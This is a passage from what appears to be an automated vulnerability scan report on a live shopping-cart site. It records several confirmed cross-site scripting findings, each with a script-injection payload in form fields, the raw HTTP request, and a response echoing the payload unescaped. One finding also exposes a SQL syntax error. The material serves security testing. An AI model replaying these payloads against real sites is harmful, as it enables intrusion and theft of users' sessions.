<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST '"--></style></script><script>alert(0x00014B)</script>
txtState POST AB
txtZip POST 3
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00014B)%3c%2fscript%3e&txtState=AB&txtZip=3&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:28:47 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="'"--></style></script><script>netsparker(0x00014B)</script>"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
cmbAdvert POST 1
Register POST Register
txtAddress1 POST 3
txtAddress2 POST 3
txtAltPhone POST 3
txtBusinessName POST Smith
txtCity POST 3
txtCountry POST 3
txtEmail POST netsparker@example.com
txtFax POST 3
txtFirstName POST Smith
txtHint POST 3
txtLastName POST Smith
txtMiddleIntial POST 3
txtpassword POST 3
txtpassword2 POST 3
txtPhone POST 3
txtState POST AB
txtZip POST '"--></style></script><script>alert(0x000164)</script>
Type POST 42

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 377
Accept-Encoding: gzip, deflate

cmbAdvert=1&Register=Register&txtAddress1=3&txtAddress2=3&txtAltPhone=3&txtBusinessName=Smith&txtCity=3&txtCountry=3&txtEmail=netsparker%40example.com&txtFax=3&txtFirstName=Smith&txtHint=3&txtLastName=Smith&txtMiddleIntial=3&txtpassword=3&txtpassword2=3&txtPhone=3&txtState=AB&txtZip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000164)%3c%2fscript%3e&Type=42

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:29:14 GMT
Content-Length: 12522
Content-Type: text/html
Cache-control: private



<html>
<head>
<title>Xtreme Powersports' General Information</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}
-->
</style>
</head>
<body bgcolor="#FFFFFF" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<table width="596" border="1" align="center" Class=Size8>
<tr Class=size10>
<td bgcolor="#FF0000"><font color="#FFFFFF"><b>ERRORS!!! Please review the error list below and fill in the form properly!</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<p>
&nbsp;&nbsp;The Create a Password was wrong length<br>
&nbsp;&nbsp;The Confirm a Password was wrong length<br>
&nbsp;&nbsp;The passwords has less then 4 charactors, please reenter passwords<br>

</p>
</td>
</tr>
</table>


<table width="596" border="0" align="center" Class=size8>
<tr bgcolor="#000099">
<td height="2"><font color="#FFFFFF"><b><a name="NewCustomer"></a>&nbsp;&nbsp;

New Customer Information

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>

<form name="form1" method="post" action="ProcessInfo.asp" style="margin:0;Padding:0;">
<input type="hidden" name="Type" value="42">

<table width="100%" Class=size8>
<tr>
<td>
<b>All items in<font color="#FF0000"> RED</font> must be completed

</b>
</td>
</tr>
</table>
<table width="580" border="1" Class=size8>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;

Enter Password and Hint Word (This will be used to review and track your orders)

</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">
Create a Password:&nbsp;
</font>

<input type="password" name="txtpassword" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;Must be 6 to 10 characters.&nbsp;&nbsp;
<font color="#FF0000">Confirm Password:&nbsp;</font>

<input type="password" name="txtPassword2" size="10" maxlength="10" Class=size8 value="3">

</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0033">Hint:&nbsp;</font>

<input type="text" name="txtHint" size="10" maxlength="10" Class=size8 value="3">

&nbsp;&nbsp;This will be Emailed to you if you forget your password.</td>
</tr>
</table>
</td>
</tr>

<tr>
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Name:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td align="left" valign="middle"><font color="#FF0000">First
Name:&nbsp;</font>
<input type="text" name="txtFirstName" size="15" maxlength="20" Class=size8

value="Smith"

>
<font color="#FF0000">&nbsp;&nbsp;Last Name:&nbsp;</font>
<input type="text" name="txtLastName" size="15" maxlength="25" Class=size8

value="Smith"

>
&nbsp;&nbsp;Middle Initial:&nbsp;
<input type="text" name="txtMiddleIntial" size="3" maxlength="4" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="580" border="0" Class=size8>
<tr>
<td align="left" valign="middle">Business Name:&nbsp;
<input type="text" name="txtBusinessName" size="40" maxlength="45" Class=size8

value="Smith"

>
</td>
</tr>
</table>
</td>
</tr>
<tr align="left" valign="top">
<td height="15" bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;
Address:
</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table width="580" Class=size8>
<tr>
<td><font color="#FF0000">Address1:&nbsp;</font>
<input type="text" name="txtAddress1" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;Address2:&nbsp;
<input type="text" name="txtAddress2" size="25" maxlength="30" Class=size8

value="3"

>
</td>
</tr>
</table>
<table Width=100% Class=size8>
<tr>
<td><font color="#FF0000">City:&nbsp;</font>
<input type="text" name="txtCity" size="25" maxlength="30" Class=size8

value="3"

>
&nbsp;&nbsp;<font color="ff0000">State/Providence:&nbsp;</font>
<select name="txtState" Class=size8>
<option value="Other Country">Other Country</option>
<option value="AB" selected>AB</option>
<option value="AL">AL</option>
<option value="AK">AK</option>
<option value="AZ">AZ</option>
<option value="AR">AR</option>
<option value="BC">BC</option>
<option value="CA">CA</option>
<option value="CO">CO</option>
<option value="CT">CT</option>
<option value="DE">DE</option>
<option value="DC">DC</option>
<option value="FL">FL</option>
<option value="GA">GA</option>
<option value="HI">HI</option>
<option value="ID">ID</option>
<option value="IL">IL</option>
<option value="IN">IN</option>
<option value="IA">IA</option>
<option value="KS">KS</option>
<option value="KY">KY</option>
<option value="LA">LA</option>
<option value="ME">ME</option>
<option value="MD">MD</option>
<option value="MA">MA</option>
<option value="MB">MB</option>
<option value="MI">MI</option>
<option value="MN">MN</option>
<option value="MO">MO</option>
<option value="MS">MS</option>
<option value="MT">MT</option>
<option value="NB">NB</option>
<option value="NC">NC</option>
<option value="ND">ND</option>
<option value="NE">NE</option>
<option value="NH">NH</option>
<option value="NJ">NJ</option>
<option value="NL">NL</option>
<option value="NM">NM</option>
<option value="NS">NS</option>
<option value="NT">NT</option>
<option value="NU">NU</option>
<option value="NV">NV</option>
<option value="NY">NY</option>
<option value="OH">OH</option>
<option value="OK">OK</option>
<option value="ON">ON</option>
<option value="OR">OR</option>
<option value="PA">PA</option>
<option value="PR">PR</option>
<option value="PE">PE</option>
<option value="QC">QC</option>
<option value="RI">RI</option>
<option value="SC">SC</option>
<option value="SD">SD</option>
<option value="SK">SK</option>
<option value="TN">TN</option>
<option value="TX">TX</option>
<option value="UT">UT</option>
<option value="VT">VT</option>
<option value="VA">VA</option>
<option value="WA">WA</option>
<option value="WV">WV</option>
<option value="WI">WI</option>
<option value="WY">WY</option>
<option value="YT">YT</option>

</select>
&nbsp;&nbsp;<font color="#FF0000">Zip:&nbsp;</font>
<input type="text" name="txtZip" size="12" maxlength="15" Class=size8

value="'"--></style></script><script>netsparker(0x000164)</script>"

>
</td>
</tr>
</table>
<table width="580" Class=size8>
<tr>
<td>Other Country:&nbsp;
<input type="text" name="txtCountry" size="30" maxlength="35" Class=size8

value="3"

>
&nbsp;&nbsp;Must be completed if not in United States
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td bgcolor="#000099" height="9"><font color="#FFFFFF"><b>&nbsp;Contact
Information:</b></font></td>
</tr>
<tr align="left" valign="top">
<td>
<table Class=size8 Width=100%>
<tr>
<td><font color="#FF0000">Phone #:&nbsp;</font>
<input type="text" name="txtPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Alt Phone #:&nbsp;
<input type="text" name="txtAltPhone" size="15" maxlength="20" Class=size8

value="3"

>
&nbsp;&nbsp;Fax #:&nbsp;
<input type="text" name="txtFax" size="15" maxlength="20" Class=size8

value="3"

>
</td>
</tr>
</table>
<table width="100%" Class=size8>
<tr>
<td><font color="#FF0000">Email Address:&nbsp;</font>

<input type="text" name="txtEmail" size="40" maxlength="45" Class=size8

value="netsparker@example.com">


</td>
</tr>
</table>
</td>
</tr>

<tr align="left" valign="middle">
<td bgcolor="#000099"><font color="#FFFFFF"><b>&nbsp;How did you hear about us:</b></font></td>
</tr>
<tr align="center" valign="top">
<td>
<table width="100%" Class=size8>
<tr align="center" valign="middle">
<td>Please Select One:&nbsp;
<select name="cmbAdvert" Class=size8>

<option value="1" Selected>Search Engine</option>
<option value="2">Other Web Site</option>
<option value="3">Print Ad</option>
<option value="4">Radio Ad</option>
<option value="5">Friend</option>
<option value="6">Email</option>
<option value="7"></option>

</select>
</td>
</tr>
</table>
</td>
</tr>

</table>
<table width="100%" border="0">
<tr align="center" valign="middle">
<td>


<input type="submit" name="Register" value="Register" Class=size8>


</td>
</tr>
</table>
</form>
</td>
</tr>
</table>

<table width="100%" border="0" cellspacing="0" cellpadding="0">
<TR>
<TD height=30>&nbsp;</TD>
</TR>
<tr align="center" valign="top" Class="Copywrite">
<td>Copyright � 2011 HLSM, Inc. All rights reserved. <br>
This material may not be published, broadcast, rewritten, or redistributed.<br>
For further information, contact HLSM, Inc.</td>
</tr>
</table>
</body>
</html>
- /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp

/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp

Parameters

Parameter Type Value
Returning POST Continue
txtEmail POST '"--></style></script><script>alert(0x00019B)</script>

Request

POST /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/SendHint/ProcessHint.asp?Type=11
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 113
Accept-Encoding: gzip, deflate

Returning=Continue&txtEmail='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x00019B)%3c%2fscript%3e

Response

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:33:34 GMT
Content-Length: 1413
Content-Type: text/html
Expires: Mon, 02 May 2011 03:33:35 GMT
Cache-control: private




<HTML>
<HEAD>
<META NAME="GENERATOR" Content="Microsoft Visual Studio 6.0">
<style type="text/css">
<!--
.size1 {font-size:1pt;font-family: Arial,Helvetica,Sans-serif;}
.size2 {font-size:2pt;font-family: Arial,Helvetica,Sans-serif;}
.size3 {font-size:3pt;font-family: Arial,Helvetica,Sans-serif;}
.size4 {font-size:4pt;font-family: Arial,Helvetica,Sans-serif;}
.size6 {font-size:6pt;font-family: Arial,Helvetica,Sans-serif;}
.size7 {font-size:7pt;font-family: Arial,Helvetica,Sans-serif;}
.size8 {font-size:8pt;font-family: Arial,Helvetica,Sans-serif;}
.size10 {font-size:10pt;font-family: Arial,Helvetica,Sans-serif;}
.size12 {font-size:12pt;font-family: Arial,Helvetica,Sans-serif;}
.size14 {font-size:14pt;font-family: Arial,Helvetica,Sans-serif;}
.size16 {font-size:16pt;font-family:Arial, Helvetica, Sans-serif;}
.Copywrite {FONT-SIZE: 9px; COLOR: #4c6b55; LINE-HEIGHT: 11px; FONT-FAMILY: Verdana, Arial, Helvetica, sans-serif; TEXT-DECORATION: none}

-->
</style>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
There was an error. <br>If this continues, please call HLSM at: 570-719-9000 <br>ASP Description: Syntax error in string in query expression 'Field14 = ''"--></style></script><script>netsparker(0x00019B)</script>''. <br>ASP File: /xtremepowersports/shoppingcart/SendHint/ProcessHint.asp <br>ASP Line: 133 <br>ASP Number: -2147217900 <br>
<P>&nbsp;</P>

</BODY>
</HTML>
- /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp CONFIRMED

https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp

Parameters

Parameter Type Value
Type POST 42
txtpassword POST '"--></style></script><script>alert(0x0001D8)</script>
txtpassword2 POST 3
txtHint POST 3
txtFirstName POST Smith
txtLastName POST Smith
txtMiddleIntial POST 3
txtBusinessName POST Smith
txtAddress1 POST 3
txtAddress2 POST 3
txtCity POST 3
txtState POST Other Country
txtZip POST 3
txtCountry POST 3
txtPhone POST 3
txtAltPhone POST 3
txtFax POST 3
txtEmail POST netsparker@example.com
cmbAdvert POST 7

Request

POST /xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp HTTP/1.1
Referer: https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CustInfo/ProcessInfo.asp?Type=41
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.onlinemicrofiche.com
Cookie: ASPSESSIONIDQCSQTSDS=GLJKBIKAECEPABJMJKKMGAGI
Content-Length: 370
Accept-Encoding: gzip, deflate

Type=42&txtpassword='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0001D8)%3c%2fscript%3e&txtpassword2=3&txtHint=3&txtFirstName=Smith&txtLastName=Smith&txtMiddleIntial=3&txtBusinessName=Smith&txtAddress1=3&txtAddress2=3&txtCity=3&txtState=Other+Country&txtZip=3&txtCountry=3&txtPhone=3&txtAltPhone=3&txtFax=3&txtEmail=netsparker%40example.com&cmbAdvert=7

Response

HTTP/1.1 200 OK
